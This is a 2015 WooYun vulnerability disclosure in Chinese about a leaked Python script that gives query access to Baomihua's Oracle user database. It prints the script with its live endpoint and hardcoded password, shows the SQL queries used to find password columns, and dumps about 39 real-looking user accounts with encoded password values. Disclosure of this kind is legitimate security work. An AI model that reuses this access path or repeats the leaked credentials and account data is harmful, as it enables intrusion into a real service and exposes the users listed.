当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116245

漏洞标题:爆米花Oracle查询脚本泄露(202万用户可拖库)

相关厂商:爆米花网

漏洞作者: lijiejie

提交时间:2015-05-26 11:40

修复时间:2015-05-31 11:42

公开时间:2015-05-31 11:42

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:6

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

爆米花Oracle查询脚本泄露(202万用户可拖库)

详细说明:

之前在服务器上发现一个python脚本,没有来得及利用。
今天看了下,通过查询接口,可以直接获取用户数据。

def __execute_main(sql, max_line):#主库
assert isinstance(sql,unicode)
try:
myprint(u'语句main:{0}'.format(sql))
payload = u'sqlCode={0}\r\nnum={1}\r\npsw={2}'.format(sql,max_line,'t34iofxnamby7vu6')
payload=payload.encode('utf8')
r = requests.post("http://pomoho.pxtadmin.com:8080/ajax/PmhManager.dbSearch,PmhManager.ashx?_method=GetResultList&_session=rw",
data=payload, timeout=300)
return r.text
except:
trace_info=traceback.format_exc()
trace_info=trace_info.replace('\n','###')
shell='start ""cmd echo "{0}"'.format(trace_info)
myprint(shell)
os.system(shell)

漏洞证明:

select banner from sys.v_$version where rownum=1

Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production


查询哪些表中有密码相关的列:
select TABLE_NAME, COLUMN_NAME from all_tab_columns where COLUMN_NAME like '%PASS%'

[[u'TABLE_NAME', u'COLUMN_NAME', u'NUM'],
[u'SMMSUSERS', u'PASSWORD', u'1'],
[u'PMHNEWSUNIONMEMBERS', u'LOGINPASSWORD', u'2'],
[u'SMMSCOOPSITES', u'PASSWORD', u'3'],
[u'PMHUSERSHIS', u'LOGINPASSWORD', u'4'],
[u'PMHOAUSER', u'U_PASSWORD', u'5'],
[u'PMHUSERQUALITYSTAT', u'PASSVIDEOCOUNT', u'6'],
[u'PUBUNIONOPERATOR', u'PASSWORD', u'7'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTPASSCOUNT', u'8'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTNOTPASSCOUNT', u'9'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'SECONDPASSCOUNT', u'10']]


数据量少的直接略过,查询PMHUSERSHIS,得到用户数202万:

baomihua.users.png


测试取几十条数据(select LOGINACCOUNT,LOGINPASSWORD,EMAIL from PMHUSERSHIS where rownum < 100)

[[u'LOGINACCOUNT', u'LOGINPASSWORD', u'EMAIL', u'NUM'],
[u'wei520920', u'2cMrE9ckotcMWPRdPkoCYA==', u'', u'1'],
[u'mht6461', u'ZVEaLKRe1XdF2AOrF7kEZg==', u'', u'2'],
[u'fly1683000', u'OnD8MMQE9sWcAKmT6SNpEw==', u'', u'3'],
[u'lklklklk01', u'REuz9lfgAQ5PJPjUiIjGpg==', u'', u'4'],
[u'mei880620', u'tNsd163GELyoVXYEApe6cA==', u'', u'5'],
[u'xingni9920', u'0TdNpbjwcBnFhtwPdgRVHw==', u'', u'6'],
[u'djs280677751', u'0vGRYsAGwvwAxImYb68tpw==', u'', u'7'],
[u'zhangping972', u'ZiIaAhHEydVXvRS1uYjl9Q==', u'', u'8'],
[u'JJ_wang', u'SreHilHcO3O4Z73BIxwspA==', u'', u'9'],
[u'qazxc89757', u'zinyVakEf0dQbt0hreoK3w==', u'', u'10'],
[u'fuyan109844385', u'BslSpTFBzDU33vCf37SzBw==', u'', u'11'],
[u'boy888', u'qgsM0kJ+77s97CLen/Bt/Q==', u'', u'12'],
[u'luDVD', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'13'],
[u'michaelchannel', u'1+PK4kckwQAShVRi9dUt0g==', u'', u'14'],
[u'371413869', u'TBWIZ0jPHWi7Afr9ErVrlA==', u'', u'15'],
[u'13186850716', u'62DY2xRCbyOGuQOJZv07Ig==', u'', u'16'],
[u'395593700', u'XC6rM+c9B+zVSathuTfalw==', u'', u'17'],
[u'BB\u9f99', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'18'],
[u'sunxiao0219', u'F2THG5E+Y6tFfhsepl1FjQ==', u'', u'19'],
[u'qwertyuiop789', u'TcToBNxQatRL12fEbMPXVw==', u'', u'20'],
[u'sunxiao0219', u'F2THG5E+Y6tFfhsepl1FjQ==', u'', u'21'],
[u'sjx005', u'VR9B4WO5yo7+sfkbdZhyHg==', u'', u'22'],
[u'liaixan', u'3V1UsTyr3UJPLnwCXzyXjQ==', u'', u'23'],
[u'licaiyunqq', u'ex+40bdfxlyJTLLecNyt7A==', u'', u'24'],
[u'vxiaodao', u'vxPF4peIKdC0D7zV+oLSDA==', u'', u'25'],
[u'vxiaodao', u'vxPF4peIKdC0D7zV+oLSDA==', u'', u'26'],
[u'467640954', u'TsOGq5m8lsf98BrXOc2T+A==', u'', u'27'],
[u'jessica\u5409\u5409', u'O3O+6khkzL00UQvfzH9IsA==', u'', u'28'],
[u'kiki498959581', u'gO609EgaNsCuNf7fFCwz/Q==', u'', u'29'],
[u'bieguchaocai', u'ONe3on/Dsx+6X91+24JyhQ==', u'', u'30'],
[u'bieguchaocai', u'ONe3on/Dsx+6X91+24JyhQ==', u'', u'31'],
[u'3262205', u'FhUbxz5Xq3pnUL+wZLjLdQ==', u'', u'32'],
[u'a52152168', u'Pj48GXAFyM3Gir53hxPCfQ==', u'', u'33'],
[u'xiangcao', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'34'],
[u'laoshideenhui', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'35'],
[u'faishao', u'1mUVQvBDKPQ/Cz6kLI5aeg==', u'', u'36'],
[u'neversaygoodbye', u'QG9wLUWIG6mIhYmw3RodWg==', u'', u'37'],
[u'kiss52039442', u'b2cBYZpXr6LtZOdpbyVT6Q==', u'', u'38'],
[u'0086uc', u'tIOsdN6RKqA94ZdZ0SpomA==', u'', u'39'],

修复方案:

不要把相关脚本直接放在服务器上。
修改密码。

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-31 11:42

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无